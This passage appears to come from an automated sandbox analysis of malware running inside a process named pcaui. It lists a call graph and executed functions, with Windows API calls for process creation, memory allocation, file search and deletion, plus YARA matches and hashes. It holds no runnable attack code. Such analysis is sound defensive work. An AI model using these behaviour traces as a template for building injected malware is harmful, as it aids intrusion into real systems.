100886->100885 100887 2809ded CreateThread 100886->100887 100888 28170f0 100889 281711a 100888->100889 100892 2818290 100889->100892 100891 2817141 100893 28182ad 100892->100893 100899 2828ef0 100893->100899 100895 28182fd 100896 2818304 100895->100896 100904 2828fd0 100895->100904 100896->100891 100898 281832d 100898->100891 100900 2828f8b 100899->100900 100902 2828f1b 100899->100902 100909 47d2f30 LdrInitializeThunk 100900->100909 100901 2828fc4 100901->100895 100902->100895 100905 2829081 100904->100905 100907 2828fff 100904->100907 100910 47d2d10 LdrInitializeThunk 100905->100910 100906 28290c6 100906->100898 100907->100898 100909->100901 100910->100906 100911 2817670 100912 2817688 100911->100912 100914 28176e2 100911->100914 100912->100914 100915 281b5b0 100912->100915 100916 281b5d6 100915->100916 100921 281b809 100916->100921 100942 2829bf0 100916->100942 100918 281b64c 100919 282ca80 2 API calls 100918->100919 100918->100921 100920 281b66b 100919->100920 100920->100921 100922 281b742 100920->100922 100923 2828e00 LdrInitializeThunk 100920->100923 100921->100914 100924 2815e90 LdrInitializeThunk 100922->100924 100926 281b761 100922->100926 100925 281b6cd 100923->100925 100924->100926 100925->100922 100928 281b6d6 100925->100928 100930 281b7f1 100926->100930 100948 2828970 100926->100948 100927 281b72a 100931 2818460 LdrInitializeThunk 100927->100931 100928->100921 100928->100927 100929 281b708 100928->100929 100945 2815e90 100928->100945 100963 2824a80 LdrInitializeThunk 100929->100963 100933 2818460 LdrInitializeThunk 100930->100933 100932 281b738 100931->100932 100932->100914 100937 281b7ff 100933->100937 100937->100914 100938 281b7c8 100953 2828a20 100938->100953 100940 281b7e2 100958 2828b80 100940->100958 100943 2829c0d 100942->100943 100944 2829c1e CreateProcessInternalW 100943->100944 100944->100918 100946 2828fd0 LdrInitializeThunk 100945->100946 100947 2815ece 100946->100947 100947->100929 100949 28289ed 100948->100949 100951 282899b 100948->100951 100964 47d39b0 LdrInitializeThunk 100949->100964 100950 2828a12 100950->100938 100951->100938 100954 2828a4b 100953->100954 100955 2828a9d 100953->100955 100954->100940 100965 47d4340 LdrInitializeThunk 100955->100965 100956 2828ac2 100956->100940 100959 2828bfd 100958->100959 100961 2828bab 100958->100961 100966 47d2fb0 LdrInitializeThunk 100959->100966 100960 2828c22 100960->100930 100961->100930 100963->100927 100964->100950 100965->100956 100966->100960 100967 2829630 100968 28296d7 100967->100968 100970 282965b 100967->100970 100969 28296ed NtReadFile 100968->100969 100971 2828c30 100972 2828cbf 100971->100972 100973 2828c5b 100971->100973 100976 47d2ee0 LdrInitializeThunk 100972->100976 100974 2828cf0 100976->100974 100977 282c9b0 100978 282b8b0 RtlFreeHeap 100977->100978 100979 282c9c5 100978->100979 100980 2828db0 100981 2828dcd 100980->100981 100984 47d2df0 LdrInitializeThunk 100981->100984 100982 2828df5 100984->100982 100985 2821df0 100989 2821e09 100985->100989 100986 2821e54 100987 282b8b0 RtlFreeHeap 100986->100987 100988 2821e64 100987->100988 100989->100986 100990 2821e94 100989->100990 100992 2821e99 100989->100992 100991 282b8b0 RtlFreeHeap 100990->100991 100991->100992 100993 2826370 100994 28263ca 100993->100994 100996 28263d7 100994->100996 100997 2823d60 100994->100997 100998 282b830 NtAllocateVirtualMemory 100997->100998 100999 2823da1 100998->100999 101000 28148c0 LdrLoadDll 100999->101000 101002 2823eae 100999->101002 101003 2823de7 101000->101003 101001 2823e30 Sleep 101001->101003 101002->100996 101003->101001 101003->101002

                                                                                    Executed Functions

                                                                                    Function 02809E10 Relevance: 36.7, Strings: 29, Instructions: 451COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 26 2809e10-280a216 27 280a227-280a233 26->27 28 280a243-280a24d 27->28 29 280a235-280a241 27->29 30 280a25e-280a26a 28->30 29->27 32 280a278-280a282 30->32 33 280a26c-280a276 30->33 34 280a293-280a29f 32->34 33->30 36 280a2a1-280a2b0 34->36 37 280a2b2-280a2bc 34->37 36->34 38 280a2cd-280a2d9 37->38 40 280a2f0 38->40 41 280a2db-280a2ee 38->41 42 280a2f7-280a301 40->42 41->38 44 280a303-280a31e 42->44 45 280a33a-280a341 42->45 46 280a320-280a324 44->46 47 280a325-280a327 44->47 48 280a343-280a359 45->48 49 280a366-280a37f 45->49 46->47 50 280a338 47->50 51 280a329-280a332 47->51 52 280a364 48->52 53 280a35b-280a361 48->53 49->49 54 280a381-280a38b 49->54 50->42 51->50 52->45 53->52 55 280a39c-280a3a5 54->55 56 280a3a7-280a3ba 55->56 57 280a3bc-280a3c0 55->57 56->55 58 280a3e1-280a3eb 57->58 59 280a3c2-280a3df 57->59 61 280a3fc-280a405 58->61 59->57 62 280a407-280a419 61->62 63 280a41b-280a42c 61->63 62->61 64 280a43d-280a446 63->64 66 280a448-280a458 64->66 67 280a45a 64->67 66->64 68 280a461-280a465 67->68 70 280a467-280a48c 68->70 71 280a48e-280a498 68->71 70->68 72 280a4a9-280a4b3 71->72 73 280a4b5-280a4c8 72->73 74 280a4ca-280a4da 72->74 73->72 74->74 76 280a4dc-280a4e5 74->76 77 280a693-280a6ac 76->77 78 280a4eb-280a4f5 76->78 77->77 80 280a6ae-280a6b8 77->80 79 280a506-280a50f 78->79 82 280a511-280a520 79->82 83 280a522-280a535 79->83 81 280a6c9-280a6d2 80->81 84 280a6e3-280a6ea 81->84 85 280a6d4-280a6e1 81->85 82->79 87 280a546-280a552 83->87 89 280a711-280a71b 84->89 90 280a6ec-280a70f 84->90 85->81 91 280a554-280a566 87->91 92 280a568-280a572 87->92 93 280a72c-280a735 89->93 90->84 91->87 95 280a583-280a58f 92->95 98 280a737-280a749 93->98 99 280a74b-280a752 93->99 96 280a591-280a5a3 95->96 97 280a5a5-280a5ac 95->97 96->95 101 280a5e3-280a5f2 97->101 102 280a5ae-280a5e1 97->102 98->93 104 280a790-280a79a 99->104 105 280a754-280a75e 99->105 106 280a5f4-280a5fe 101->106 107 280a64b-280a651 101->107 102->97 108 280a76f-280a77b 105->108 109 280a60f-280a61b 106->109 110 280a655-280a65c 107->110 111 280a78b call 282b520 108->111 112 280a77d-280a789 108->112 113 280a62c-280a647 109->113 114 280a61d-280a62a 109->114 115 280a68e 110->115 116 280a65e-280a68c 110->116 111->104 118 280a760-280a769 112->118 113->113 119 280a649 113->119 114->109 115->76 116->110 118->108 119->77
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &Z$)#$0a$66$=]$A$C$LF$MW$Py$X,$[$]s$_n`3$`3$a)$ao$gn$m$nK$nv$s:$t$t?$td$tn$w($G$|
                                                                                    • API String ID: 0-31118547
                                                                                    • Opcode ID: 7ab0c46a844c4997754260ef2203b7807d13e617a6b3dca20b8989287e2fc922
                                                                                    • Instruction ID: 5175fdf5d7a190a02b2d63e7e36fd7961f805bd69e74ce11cb6c3be771c77448
                                                                                    • Opcode Fuzzy Hash: 7ab0c46a844c4997754260ef2203b7807d13e617a6b3dca20b8989287e2fc922
                                                                                    • Instruction Fuzzy Hash: 404292B8D05228CBEB68CF84CD947DDBBB1BB45308F1081DAC649BB281D7B95A84CF55
                                                                                    Function 0281C920 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0281CA04
                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0281CA3F
                                                                                    • FindClose.KERNELBASE(?), ref: 0281CA4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                    • Instruction ID: 7d01b2a025edf5a055cb99d9f753254eda8272e468255894fb41e7a3939a5dfd
                                                                                    • Opcode Fuzzy Hash: 299f0ff1c5cf853f094545c58691598bf6e6fe64b8969edb7be736c681c31176
                                                                                    • Instruction Fuzzy Hash: A431C3B9A40308BBDB21DB64CC84FEF777D9B45704F144459B509E75C0D770AA848BA2
                                                                                    Function 028294C0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 028295BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                    • Instruction ID: cb3b1d973d26258575c00d7a383dd3356bfdcff4beeb96e411d25c4666465394
                                                                                    • Opcode Fuzzy Hash: 3d70d8d9e27a0add59b9421d482b25a71217f0a204cfcef757f10121b7412aa6
                                                                                    • Instruction Fuzzy Hash: DC31B8B9A11609AFCB44DF98D881EEF77B9EF8C314F108219F919A7340D730A951CBA5
                                                                                    Function 02829630 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02829716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                    • Instruction ID: 11849a9fe948c9351c5923a1460ee288922d298191ec3e577e0e72c594337846
                                                                                    • Opcode Fuzzy Hash: 93a2cee56a1428797df3da84a8abdbe1b9a369cea57cc10243a458e0e3c02c6c
                                                                                    • Instruction Fuzzy Hash: 9431C9B9A00608ABDB04DF98D881EEF77B9AF8C314F108119F919A7240D770A955CFA5
                                                                                    Function 02829940 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(028120FE,?,028282AE,00000000,00000004,00003000,?,?,?,?,?,028282AE,028120FE,028282AE,00000000), ref: 02829A0B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                    • Instruction ID: f9b10938c3c8309650a4ec391492cf101585a2f7878f8aef222f9422a5aadb00
                                                                                    • Opcode Fuzzy Hash: b2bcc8214340253df5124bb0783499fedb635cf7d8e3ae221ba737ecb91fef68
                                                                                    • Instruction Fuzzy Hash: 91212BB9A00219AFDB14DF98DC81FEFB7B9EF88710F108119FD19A7240D770A9518BA5
                                                                                    Function 02829720 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                    • Instruction ID: 71680fc5d5836b7648f36b0d747ade3351b0eecc47f9ea596c8bc9bf76ebf97e
                                                                                    • Opcode Fuzzy Hash: 44476250ceff69c8a1bd10f2481759560b735b8ff55dc8cfa59ac658486d36a1
                                                                                    • Instruction Fuzzy Hash: 0111C239A00618BFD614EBA8DC41FEBB7ADDF85314F008509F90DA7280D7707A558BA6
                                                                                    Function 028297D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02829807
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction ID: eb0e44a5298bd3768fcabf3b8c13d211e1c31297767043accc130b9bfcf2585a
                                                                                    • Opcode Fuzzy Hash: a6ce47e24ac997c0e1dd9abbf1fa8a3d5f959370d8a09260ef0fc3f9f560e904
                                                                                    • Instruction Fuzzy Hash: 4BE0463A200614BBD220AA99DC41FDB77AEDFC5724F008419FA0DAB281C671B9158BF1
                                                                                    Function 047D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                    • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                    • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                    • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                    Function 047D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                    • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                    • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                    • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                    Function 047D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                    • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                    • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                    • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                    Function 047D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                    • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                    • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                    • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                    Function 047D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                    • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                    • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                    • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                    Function 047D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                    • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                    • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                    • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                    Function 047D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                    • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                    • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                    • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                    Function 047D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                    • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                    • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                    • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                    Function 047D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                    • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                    • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                    • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                    Function 047D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                    • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                    • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                    • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                    Function 047D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                    • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                    • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                    • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                    Function 047D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
